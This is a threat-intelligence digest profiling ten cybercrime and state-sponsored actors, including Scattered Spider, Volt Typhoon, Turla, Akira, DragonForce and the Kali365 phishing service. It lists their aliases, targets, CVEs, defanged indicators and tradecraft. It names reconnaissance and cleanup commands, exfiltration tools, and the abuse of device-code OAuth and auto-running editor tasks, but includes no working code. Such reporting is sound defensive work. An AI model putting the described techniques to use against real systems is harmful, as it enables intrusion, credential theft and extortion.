CL-CRI-1089 is a cybercrime activity cluster tracked by Palo Alto Networks Unit 42 and assessed to have been active since at least early 2023. The cluster is linked to large-scale malvertising operations targeting both Windows and macOS users. Reported campaigns associated with CL-CRI-1089 include Operation FlutterBridge on macOS; the earlier macOS JSCoreRunner campaign, also referred to as FileRipple; and Windows-focused activity involving RecipeLister, Calendaromatic, DocuFlex, AppSuite PDF, and attacks under the TamperedChef campaign umbrella. Some reporting also notes overlap with the broader TamperedChef or EvilAI activity. The group distributes trojanized but functional applications through malicious Google and YouTube ads and sponsored search results, often using shell companies and verified corporate entities to purchase advertising and sign code. Named entities linked in reporting include AdsParkPro LTD, Advantage Web Marketing LLC, and SOFT WE ART LIMITED, with some content stating the cluster primarily leveraged corporate structures connected to Ukrainian entities for code signing. Observed samples were signed with legitimate certificates or valid Apple Developer IDs, and macOS samples passed Apple notarization. On macOS, CL-CRI-1089 deployed FlutterShell via fake applications including PodcastsLounge, PDF-Brain, and PDF-Ninja as part of Operation FlutterBridge. FlutterShell is described as a backdoor with adware and browser-hijacking functionality. Reported capabilities include arbitrary command execution, file system interaction, environment variable exfiltration, system fingerprinting, browser session theft, and modification of Google Chrome Secure Preferences to redirect searches and new tabs to attacker-controlled ad sites such as sinterfumesco.com. The malware uses a Flutter/WebView architecture with a JavaScript-to-native bridge, allowing malicious logic to be hosted remotely and changed dynamically without updating the binary. Some variants included an AI document summarization feature that sent uploaded documents to attacker-controlled servers. Across reporting, CL-CRI-1089 is characterized as a broad, evolving malvertising-driven cybercrime operation using polished lure sites, trojanized productivity software, code-signing abuse, and rapidly changing infrastructure to distribute adware, browser hijackers, and backdoor-capable malware.

Scattered Spider is a financially motivated cybercrime threat actor active since at least May 2022. It is tracked under numerous aliases including UNC3944, Octo Tempest, Muddled Libra, Scatter Swine, 0ktapus/Oktapus, Roasted 0ktapus, StarFraud, DEV-0971, LUCR-3, and STORM-0875. Public reporting in the provided content also describes it as a loosely affiliated or umbrella cluster rather than a single tightly bounded group. The group is known for aggressive social engineering and identity-focused intrusion tradecraft, especially voice phishing and help-desk impersonation. Reported techniques include impersonating internal IT personnel, phishing phone calls and targeted SMS, SIM swapping, MFA fatigue, bypassing MFA, exploiting IT support processes, contacting victim support teams, and using victims’ personal information to coerce disclosure of credentials. The content also notes credential theft through phishing pages, session and credential theft, use of infostealers such as Raccoon Stealer, and review of internal documentation and procedures after access to expand privileges and reach sensitive systems. Scattered Spider has targeted organizations primarily in the United States, with later reporting indicating campaigns against UK and US retail, and activity affecting hospitality, telecommunications, technology, cryptocurrency-related entities, media, entertainment, financial services, insurance, aviation, and SaaS/cloud-centric enterprises. The content specifically references compromises or attributed activity involving Twilio, Cloudflare, Reddit, Caesars Entertainment, MGM Resorts International, Marks & Spencer, Harrods, Qantas-related airline targeting, and broader targeting of platforms and environments such as Okta, Salesforce, Microsoft 365, SharePoint, OneDrive, and VMware vCenter. The actor has been publicly linked to the 2022 Twilio and Cloudflare activity and is associated with the 0ktapus campaign targeting technology companies through SMS phishing and fake Okta login pages. Okta assessed Scatter Swine as the same actor as 0ktapus. The group is also described as being behind or linked to the 2023 Las Vegas casino intrusions, including reporting that access to MGM was obtained through a short help-desk social-engineering call. Since mid-2023, the content states that Scattered Spider has conducted double-extortion campaigns using BlackCat/ALPHV ransomware, including deployment on Windows, Linux, and later VMware ESXi systems. Reported post-compromise tradecraft includes use of VPN access and remote monitoring and management tools for persistence; exploitation of stolen Azure credentials and a ForgeRock OpenAM vulnerability; Bring Your Own Vulnerable Driver techniques to bypass endpoint security; deployment of RattyRAT; targeting of VMware vCenter with the bedevil Linux rootkit; mailbox-rule modification to delete emails from security vendors and exfiltrate email; and data exfiltration via transfer.sh, Rclone, MEGAsync, Dropbox, Gofile, shz.al, Storj, Temp.sh, Paste.ee, Backblaze, and AWS S3. The content also notes use of residential proxy services such as NSOCKS and TrueSocks, WMI via Impacket for lateral movement, enumeration of remote systems including VMware vCenter infrastructure, retrieval of browser histories via infostealer malware, searching for credential-storage documentation, and use of self-signed and stolen certificates, including certificates originally issued to NVIDIA and Global Software LLC. The provided reporting repeatedly associates Scattered Spider with English-speaking actors and with the broader Com ecosystem, alongside overlaps or shared playbooks with groups such as LAPSUS$ and ShinyHunters. Some reporting cited in the content describes members as native English-speaking individuals roughly 17 to 22 years old, primarily in Western countries, and notes arrests in late 2024 followed by renewed activity in 2025. The content also references sub-grouping or analytical overlap under labels such as Scattered LAPSUS$ Hunters.

UNK_DeadDrop is a threat cluster tracked by Proofpoint and assessed as likely North Korea-aligned. Proofpoint observed the activity between April and May 2026, during which the actor sent more than 250 phishing emails to individuals at nearly 100 organizations, primarily in the United States. Targeted sectors included cryptocurrency, finance, technology, education, business services, financial services, entertainment and media, and telecommunications, with a particular focus on developers and organizations handling cryptocurrency assets. The actor used fake job offers, developer recruitment, code review, and technical testing lures. It impersonated legitimate companies including Ondo Finance, Nourish, Hypen Connect, Empower Pharmacy, NXLog, OnePlan, and Valon, and also used fabricated startup identities such as Pulsynk and Trixauvex. The phishing emails directed victims to attacker-controlled GitHub and GitLab repositories presented as coding assignments, open-source projects, or cryptocurrency-related projects. The repositories contained hidden .vscode/tasks.json files configured to execute automatically when opened in Visual Studio Code or Cursor. Proofpoint reported that Cursor executed the malicious task without prompting the user, while VS Code required approval. The execution chain launched platform-specific malware for macOS, Linux, and Windows and installed a malicious VS Code extension disguised as a Google service. On macOS and Linux, the extension provided persistence by relaunching the malware when the editor was opened; on Windows, the infection path was described as a single infostealer operation without persistence. On macOS and Linux, UNK_DeadDrop used modified binaries based on the open-source Overlord command-and-control framework, maintaining persistent WebSocket connectivity to attacker-controlled infrastructure. Proofpoint reported custom Overlord modules including browserlogin, companywallet, and cleanup. On Windows, the malware executed within the editor's Electron process using JavaScript and Python payloads. The malware supported remote access, credential theft, browser data theft, and cryptocurrency wallet theft. Reported collection included browser credentials, cookies, Safe Storage keys, browser wallet extension data, standalone wallet directories, Firefox and Chromium profile data, and data from 35 wallet browser extensions and 18 standalone wallet applications on Windows. On macOS, the actor used a fake system password prompt via darwin-password-prompt to capture the user's password, then modified Keychain access controls and extracted credentials from browsers including Chrome, Brave, Edge, Opera, Vivaldi, Arc, Yandex, and Chromium. On Linux, it used Zenity-based fake prompts and attempted to extract GNOME Keyring secrets. Stolen data was compressed and exfiltrated to attacker-controlled infrastructure including 23.137.105[.]75:5173. Proofpoint identified overlaps with the DPRK-linked Contagious Interview activity cluster in targeting, social engineering, and theft objectives, but tracked UNK_DeadDrop as a distinct cluster due to differences in telemetry, infrastructure, scale, delivery method, and payload implementation. Specifically, Proofpoint noted email-based initial access rather than LinkedIn-centric lures, abuse of tasks.json auto-execution rather than npm installation, and use of Overlord-based tooling instead of malware families such as OtterCookie and FlexibleFerret. Known aliases and tracked names in the provided content: UNK_DeadDrop, unk_deaddrop. Related activity overlap noted in the content: Contagious Interview.

Volt Typhoon is a Chinese state-sponsored threat actor associated with long-term intrusions into U.S. critical infrastructure, including utilities, ports, telecommunications-related environments, agricultural systems, transportation systems, water treatment, the electrical grid, and networks supporting U.S. military installations overseas. The content describes the group as part of PRC state activity and, in one reference, as military cyber actors. Known aliases in the provided content include Bronze Silhouette, DEV-0391, Insidious Taurus, Storm-0391, UNC3236, Vanguard Panda, and Voltzite. The group is described as operating since at least 2019 and emphasizing pre-positioning and persistence in critical infrastructure, with CISA reporting that it remained in infrastructure for months without overt action. Its tradecraft relies heavily on valid accounts and living-off-the-land techniques rather than custom malware or zero-days. Reported initial access methods include exploitation of vulnerabilities in edge and networking devices, specifically Fortinet, Ivanti, and Cisco appliances, as well as use of outdated routers and compromised SOHO/router infrastructure. Observed techniques in the provided content include use of T1078 Valid Accounts; hands-on-keyboard activity via the Windows command line; PowerShell for remote system discovery; WMIC for execution, remote system discovery, and temporary directory creation; Tasklist for process enumeration; Registry queries such as reg query hklm\software\ to identify installed software including PuTTY; obtaining the victim system's current location; use of legitimate network and forensic tools and customized open-source tools for command and control; and use of legitimate-looking filenames such as cisco_up.exe, cl64.exe, vm3dservice.exe, watchdogd.exe, Win.exe, WmiPreSV.exe, and WmiPrvSE.exe for Earthworm and Fast Reverse Proxy tools. The content also states that Volt Typhoon stole files from sensitive file servers, saved stolen files including ntds.dit and the SYSTEM and SECURITY Registry hives to C:\Windows\Temp\, extracted event logs with Wevtutil, targeted network administrator browser data including browsing history and stored credentials, attempted to obtain credentials from OpenSSH, RealVNC, and PuTTY, and deleted artifacts using rd /S and by removing systeminfo.dat from C:\Users\Public\Documentsfiles.

DragonForce is a financially motivated ransomware-as-a-service operation, later described as a self-styled ransomware cartel, active since at least August 2023. Reporting in the provided content describes it as a rapidly expanding double-extortion actor that exfiltrates data before encryption and uses leak-site publication and public disclosure threats to pressure victims. Multiple sources in the content state there is no evidence of nation-state sponsorship or ideological affiliation. Several reports assess DragonForce as likely part of the broader Russian-speaking cybercriminal ecosystem, or likely originating from Russia/CIS, based in part on its explicit prohibition on targeting Russia and other CIS organizations. The group operates centralized criminal infrastructure for affiliates, including leak sites, negotiation panels, file servers, admin/client panels, and automated payment-splitting. Its leak site is referred to as DragonBlog. DragonForce supports attacks against Windows, Linux, VMware ESXi, BSD, and NAS environments, and advertises configurable encryption modes and operational features such as delayed execution, multithreading, background execution, and dry-run testing. The content also states that DragonForce uses defense evasion techniques including terminating security processes and deleting backups and shadow copies. DragonForce’s model evolved from a more traditional RaaS program into a broader cartel structure. In March 2025 it introduced a cartel model allowing affiliates to create their own brands while using DragonForce infrastructure and tools. The content also describes a low-barrier affiliate model over time, including later mass recruitment and white-label-style services. DragonForce integrated an initial access broker platform called Suppliers for brokering VPN, Citrix, RDP, and botnet access, and advertised extortion-support services including data analysis, executive letters, call scripts, and negotiation support through a partner called Verified. It has also been described as emphasizing public relations and coalition branding, including partnership claims on criminal forums. The content links DragonForce to aggressive ecosystem expansion and consolidation. It reportedly partnered with BreachForums to integrate stolen-data distribution with ransomware operations. It announced a coalition with LockBit and Qilin in September 2025, although one report noted no verified evidence of shared infrastructure or joint operations. Multiple reports state DragonForce absorbed, displaced, or recruited affiliates from rival operations including BlackLock and RansomHub, and that it attacked rival groups such as BlackLock and Mamona by defacing their sites and leaking internal communications. One report also mentions DragonForce as a possible culprit in the LockBit panel compromise, but that attribution is presented only as a possibility. Targeting in the provided content is global, with victims in more than 30 countries and the United States identified as the primary target. Sectors explicitly mentioned include manufacturing, business services, technology, construction, healthcare, IT services and consulting, architecture and planning, law practice, real estate, machinery manufacturing, transportation, retail, and finance. One report states DragonForce most heavily targets manufacturing. Another notes increased finance-sector victimization and expects DragonForce to maintain or increase tempo against finance targets. The content also states DragonForce has compromised more than 400 organizations worldwide, while another report says it had listed about 136 victims on its leak site as of March. Operationally, DragonForce is described as using affiliates and allowing multiple groups to use its leak site and infrastructure, which complicates attribution because different victims may reflect different affiliate tradecraft. The content states DragonForce obtains access through exposed services, credential compromise, and integrated access-broker channels. In one Sophos investigation, attackers exploited SimpleHelp vulnerabilities CVE-2024-57727, CVE-2024-57728, and CVE-2024-57726 via a managed service provider to conduct reconnaissance and deploy DragonForce ransomware into downstream customer environments, with encryption and data exfiltration observed. The content also links DragonForce to major UK retail incidents, including Marks & Spencer, Co-op, and Harrods, with reporting stating DragonForce malware was used under a ransomware-for-hire arrangement and that researchers believed the retail attacks involved collaboration with Scattered Spider. DragonForce also claimed attacks against Belk and possession of approximately 156 GB of stolen Belk data. The content describes DragonForce as highly active and growing. It was identified as the most active group in one leak-site dataset with a reported 428.6% surge in posts, and other reporting notes substantial victim growth after the shutdown of RansomHub. Additional aliases or sub-groups are not clearly established in the provided content beyond the group’s own branding as a cartel and its infrastructure/services such as DragonBlog and Suppliers.

VerdantBamboo is a China-nexus, Chinese state-linked espionage threat actor tracked by Volexity. Volexity reported overlap with Clay Typhoon (Microsoft), UNC5221 (Google), and Warp Panda (CrowdStrike); the content also explicitly identifies VerdantBamboo as WARP PANDA and UNC5221. In the reported activity, VerdantBamboo maintained covert access to a victim environment for at least 18 months and targeted edge appliances and proprietary systems that typically lack EDR coverage, including an Egnyte Storage Sync appliance, a Synology NAS, and a managed services provider's pfSense firewall. Volexity assessed with medium confidence that compromise of the MSP enabled the downstream victim intrusion. Observed tradecraft included use of valid credentials, abuse of a local privilege escalation condition in Egnyte Storage Sync fixed in version 13.13, living-off-the-land techniques, cron-based persistence, SSH access, use of SSL VPN access, and use of compromised appliances as covert proxies to access the victim's Microsoft 365 environment while blending with legitimate traffic and evading Conditional Access controls. After remediation, the actor returned using stolen administrative credentials to access the victim firewall, enabled web SSL VPN access, and pivoted internally. Malware and tooling directly mentioned in the content include BRICKSTORM, a Golang remote access trojan used as a primary implant, including a FreeBSD/BSD variant deployed on pfSense; PLENET, also known as GRIMBOLT, a previously undocumented cross-platform backdoor built from .NET Core using Native AOT that supports interactive shell, remote command execution, file manipulation, and C2 switching; and AGENTPSD, a Python-based reverse shell assessed to serve as a fallback implant. Volexity described VerdantBamboo as highly sophisticated and noted its focus on combining malware deployment with stealthy abuse of edge infrastructure and systems that traditionally do not or cannot run EDR software.

Turla is a Russian state-sponsored, Russian-speaking cyberespionage threat actor that has conducted espionage operations for more than a decade. The group primarily targets foreign governments, embassies, and other government organizations, including European government entities, and has also targeted Ukraine-related defense and government organizations. Reported aliases in the provided content include ATG26, Belugasturgeon, Blue Python, Group 88, Iron Hunter, Krypton, Pensive Ursa, Secret Blizzard, Snake, Turla APT, Turla Team, Uroburos, Venomous Bear, Waterbug, WhiteBear, and Wraith. The content describes Turla using custom malware and overlapping backdoor access to maintain persistence while evading defenses. Malware and tooling explicitly associated with Turla here include Kazuar (including Kazuar v2 and v3, described as Turla’s flagship backdoor), Carbon, HyperStack, RPC backdoors, JavaScript backdoors, DeliveryCheck, and the Epic dropper. In one Accenture-reported intrusion against a European government organization, Turla used HyperStack, Kazuar, and Carbon together, with varied command-and-control implementations including compromised legitimate websites, internal proxy nodes, and Pastebin-based tasking to preserve reentry options. Observed techniques in the content include persistence via HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run using the value local_update_check and by saving a custom executable containing Metasploit shellcode to the Startup folder; command execution via cmd.exe and PowerShell; in-memory AMSI bypass by patching amsi.dll in PowerShell scripts; use of Google Apps Script as command-and-control for a JavaScript backdoor; file upload from victim machines via RPC backdoors; process discovery using tasklist /v and enumeration of processes tied to specific ports or named pipes; network and system survey activity using arp -a, nbtstat -n, net config, ipconfig /all, route, NBTscan, and fsutil fsinfo drives; and use of named-pipe RPC communications and IPC$ shares for lateral movement in HyperStack. The content also states that Turla has obtained and customized publicly available tools such as Mimikatz, and that Microsoft and CERT-UA warned of Turla attacks targeting the defense industry and Microsoft Exchange servers with the DeliveryCheck backdoor. Google Threat Intelligence Group and other reporting cited in the content state that Turla exploited CVE-2025-8088 alongside other Russia-aligned actors. Separate ESET reporting in the content provides technical evidence of direct operational collaboration between Gamaredon and Turla in incidents from February to June 2025, where Gamaredon tooling including PteroGraphin and PteroOdd was used to deploy Turla’s Kazuar backdoor and, in at least one case, restore Turla’s access after loss of foothold.

Kali365, also referred to as K365, is a phishing-as-a-service (PhaaS) platform first observed in April 2026 and promoted primarily through Telegram. It is described as a subscription-based service, reportedly priced around $250 per month or $2,000 per year, that lowers the barrier for less-technical attackers by providing AI-generated phishing lures, automated campaign templates, real-time victim or target tracking dashboards, and OAuth token capture capabilities. Kali365 initially focused on Microsoft 365 compromise by abusing Microsoft’s OAuth 2.0 device authorization flow. In this workflow, the operator initiates a legitimate device-code request and embeds the Microsoft user code into a phishing page or lure. Victims are then tricked into completing authentication on Microsoft’s legitimate device login endpoint, after which Microsoft issues access and refresh tokens to the attacker-controlled session. This enables bypass of MFA without intercepting credentials directly and can provide persistent access to Microsoft 365 environments, including services such as Outlook, Teams, OneDrive, and other cloud applications. Reporting cited in the content states that Kali365 emerged in March 2026 and overtook EvilTokens in observed activity by May 2026. It has been associated with Microsoft-themed document-sharing and verification lures, multi-stage redirect chains, and abuse of trusted infrastructure and redirectors. Observed infrastructure includes Cloudflare Workers-hosted phishing pages and command-and-control components such as panel[.]securehubcloud[.]com, api[.]securehubcloud[.]com, and boss[.]securehubcloud[.]com. Arctic Wolf identified a live command-and-control panel branded internally as "K365 Control," a 126-host phishing cluster active in May 2026, and a rotating infrastructure that impersonated brands including Microsoft Outlook, Microsoft Live, Okta SSO, Xerox DocuShare, LiveDrive, GMX, and AWS-style naming patterns. The operation has expanded beyond Microsoft 365 token theft into a broader multi-brand phishing and account-compromise platform. Reported targets and impersonated services include Okta, Xerox DocuShare, LiveDrive, GMX, AWS naming patterns, Mail.ru, Yandex Disk, Odnoklassniki, and MAX Messenger. A notable campaign targeted users of Russia’s MAX Messenger via a fake prize-claim page at greatness-marketing[.]top that collected Russian phone numbers, one-time passwords, and optional 2FA passwords, with captured data exfiltrated in real time through the Telegram bot @NovosibyrskyMoneyBot (also identified as sova_novosibirsk_bot). Arctic Wolf assessed this as the same operator expanding the original Kali365 operation. The content attributes Kali365 to a criminal phishing service operation rather than a nation-state actor. No high-confidence nation-state attribution is provided in the supplied material.

Akira is a financially motivated ransomware operation active since March 2023 and commonly referred to as Akira ransomware. Aliases present in the source content include akira_ransomware, akira_ransomware_actors, akira_ransomware_gang, akira_ransomware_group, Gold Sahara, Howling Scorpius, Punk Spider, and Storm-1567. The group uses a double-extortion model, stealing data before encrypting systems, and has targeted organizations across multiple sectors including education, finance, real estate, healthcare, manufacturing, and critical infrastructure. Joint government reporting cited in the content states Akira compromised more than 250 organizations worldwide and received more than $42 million in ransom payments since early 2023; other reporting in the content notes more than 300 organizations compromised. Akira has remained one of the most active ransomware brands in multiple datasets. The content states it ranked second in one 24-month leak-site dataset with 1,124 victims and was continuously operational across the full period. It is also described as among the most active groups in Q3 2025, with 201 attack claims in Q1 2026, and as a leading or top Ransomware-as-a-Service brand in 2025 reporting. The group has used multiple ransomware variants. Earlier Akira versions were written in C++ and appended the .akira extension. Since August 2023, some attacks have used the Rust-based Megazord variant, which encrypts files with the .powerranges extension. The content also states Akira developed a Linux encryptor to target VMware ESXi servers, and that operators have deployed different variants against different system architectures within the same intrusion. Akira ransomware uses a hybrid encryption scheme combining ChaCha20 and RSA and can perform full or partial encryption depending on file type and size. Initial access methods directly mentioned in the content include abuse of VPN services without MFA, exposed RDP services, spear phishing, valid credentials, exploitation of Cisco vulnerabilities CVE-2020-3259 and CVE-2023-20269, exploitation of SonicWall SSL VPN access control flaw CVE-2024-40766, and exploitation of Veeam Backup & Replication flaw CVE-2024-40711. Multiple source excerpts also state that Akira regularly exploits exposed VPNs and remote services using stolen or weak credentials, often sourced from infostealers or phishing. The content specifically highlights repeated targeting of SonicWall appliances and SSL VPN infrastructure, including continued attacks using compromised accounts. Post-compromise tradecraft described in the content includes creation of new domain accounts for persistence, including an administrative account named itadm; credential theft via Kerberoasting and LSASS memory access; use of Mimikatz and LaZagne; reconnaissance with SoftPerfect, Advanced IP Scanner, and MASSCAN; use of net commands to identify domain controllers and trust relationships; lateral movement via RDP; and remote host discovery using Advanced IP Scanner and MASSCAN. For command and control or remote access, the content mentions AnyDesk, RustDesk, Ngrok, and Cloudflare Tunnel. For exfiltration, Akira actors have used FileZilla, WinRAR, WinSCP, RClone, and cloud-storage-based exfiltration via Rclone. Defense evasion noted in the content includes disabling security software and use of PowerTool with the Zemana AntiMalware driver to terminate antivirus-related processes. One source excerpt also notes Akira-linked intrusion chains using Cobalt Strike beacons and EDR-killing drivers. Victimology explicitly mentioned in the content includes attacks or claimed attacks against Nissan Australia and Stanford University. The content also notes Akira activity affecting the SME market and increased attacks on critical infrastructure. Reporting cited in the content says the group has accelerated attacks on critical infrastructure in recent months. The content characterizes Akira as part of the ransomware-as-a-service ecosystem. One cited report states that Akira and Qilin have shifted back toward encryption as a primary pressure mechanism as pure data extortion becomes less effective. Another cited article states that DragonForce, Play, Payload, Nova, and Akira operated with a shared RaaS model but no infrastructure overlap. The content also notes Microsoft linked Fox Tempest-enabled malware-signing activity to operations involving Akira.

Storm-3075 is a Microsoft-tracked initial access broker and malware distributor. Microsoft observed it using AI-themed malvertising to deliver payloads on behalf of multiple downstream actors. In the reported 2026 activity, Storm-3075 was linked to a fake product called "Awesome AI Windows Plugin" promoted through free movie streaming sites, and Microsoft also noted related AI-themed lures such as "Flux Pro AI." Microsoft attributed the "Awesome AI Windows Plugin" malvertising activity to Storm-3075 and reported that it has also distributed Vidar Stealer, Lumma Stealer, Hijack Loader, and Oyster in similar campaigns. In one documented campaign on March 13, 2026, a single Storm-3075 operation targeted more than 66,000 devices, with most impacted devices assessed as consumer endpoints. The top affected countries were Japan, South Africa, the United States, and France. The infection chain redirected users from free movie streaming sites to a GitHub-hosted download, including ProFluxeFlowAi-win-Setup.exe from a repository named shippingtechnologymovie in a folder named AI-techVideos. The executable was fraudulently code-signed with a Microsoft-issued certificate associated with Fox Tempest. The malware displayed a CAPTCHA-like or "Continue" checkbox before proceeding, which Microsoft assessed as an anti-analysis measure. After user interaction, it dropped pythonw.exe and LICENSE.txt into \AppData\Local\ and used a Python downloader or shellcode-loaded next stage to retrieve malware from brokeapt[.]com, ultimately delivering Vidar infostealer. Microsoft linked the malware-signing component in this activity to Fox Tempest, a financially motivated group operating a malware-signing-as-a-service used by multiple criminal actors. No additional aliases or sub-groups for Storm-3075 were provided in the source content.